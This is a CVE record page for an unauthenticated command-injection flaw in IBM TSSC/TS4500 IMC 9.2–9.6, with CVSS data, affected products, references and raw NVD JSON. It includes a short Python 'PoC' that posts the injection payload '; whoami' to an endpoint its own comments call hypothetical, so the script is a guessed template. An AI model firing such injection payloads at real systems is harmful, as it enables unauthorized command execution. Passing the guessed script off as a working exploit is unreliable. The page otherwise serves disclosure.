CVE-2026-5935

Description

IBM Total Storage Service Console (TSSC) / TS4500 IMC 9.2, 9.3, 9.4, 9.5, 9.6 TSSC/IMC could allow an unauthenticated user to execute arbitrary commands with normal user privileges on the system due to improper validation of user supplied input.

CVSS Details

CVSS Score

7.3

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:ibm:total_storage_service_console:9.2:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:ibm:total_storage_service_console:9.3:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:ibm:total_storage_service_console:9.4:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:ibm:total_storage_service_console:9.5:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:ibm:total_storage_service_console:9.6:*:*:*:*:*:*:* - VULNERABLE

IBM TSSC/TS4500 IMC 9.2

IBM TSSC/TS4500 IMC 9.3

IBM TSSC/TS4500 IMC 9.4

IBM TSSC/TS4500 IMC 9.5

IBM TSSC/TS4500 IMC 9.6

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Target URL (Hypothetical endpoint based on vulnerability description)
target_url = "http://target-tssc-ip:port/vulnerable_api_endpoint"

# Malicious payload to execute arbitrary command (e.g., 'whoami')
# The payload exploits improper input validation to inject commands.
payload = "; whoami"

# Headers often required for console APIs
headers = {
    "User-Agent": "Mozilla/5.0",
    "Content-Type": "application/x-www-form-urlencoded"
}

try:
    # Send the malicious request without authentication
    # The vulnerability specifically requires no authentication (PR:N)
    response = requests.post(target_url, data={"user_input": payload}, headers=headers, timeout=10)
    
    if response.status_code == 200:
        print("[+] Exploit successful! Command output:")
        print(response.text)
    else:
        print(f"[-] Request failed with status code: {response.status_code}")

except Exception as e:
    print(f"[!] An error occurred: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-5935
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-5935
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-5935/
[4] VulDB https://vuldb.com/cve/CVE-2026-5935
[5] https://www.ibm.com/support/pages/node/7270127

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-5935", "sourceIdentifier": "[email protected]", "published": "2026-04-23T00:16:46.900", "lastModified": "2026-05-18T16:57:24.933", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "IBM Total Storage Service Console (TSSC) / TS4500 IMC 9.2, 9.3, 9.4, 9.5, 9.6 TSSC/IMC could allow an unauthenticated user to execute arbitrary commands with normal user privileges on the system due to improper validation of user supplied input."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-78"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ibm:total_storage_service_console:9.2:*:*:*:*:*:*:*", "matchCriteriaId": "4B9351F0-CCAE-4FF1-B4F7-6927E14CEAE1"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:total_storage_service_console:9.3:*:*:*:*:*:*:*", "matchCriteriaId": "6C515F00-4712-45D3-84E6-180F7740AE4A"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:total_storage_service_console:9.4:*:*:*:*:*:*:*", "matchCriteriaId": "05359041-FF28-458C-9193-53293C03A1C5"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:total_storage_service_console:9.5:*:*:*:*:*:*:*", "matchCriteriaId": "28BD55FD-194E-4996-AB4F-880300042D59"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:total_storage_service_console:9.6:*:*:*:*:*:*:*", "matchCriteriaId": "9321F67D-80EC-4CC6-B642-955C0864C410"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:ts4500_imc:9.2:*:*:*:*:*:*:*", "matchCriteriaId": "116EE78F-D060-4F75-813C-54264734537B"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:ts4500_imc:9.3:*:*:*:*:*:*:*", "matchCriteriaId": "451E8164-7B55-4F04-A079-CBB07DE5E53F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:ts4500_imc:9.4:*:*:*:*:*:*:*", "matchCriteriaId": "5E8C3809-E867-4C07-89E4-808C932E7BAC"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:ts4500_imc:9.5:*:*:*:*:*:*:*", "matchCriteriaId": "01FE4835-0707-4CEE-A6C5-7F87FCF67D46"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:ts4500_imc:9.6:*:*:*:*:*:*:*", "matchCriteriaId": "17832436-EC1B-44D7-86CD-99D0B2BE9112"}]}]}], "references": [{"url": "https://www.ibm.com/support/pages/node/7270127", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}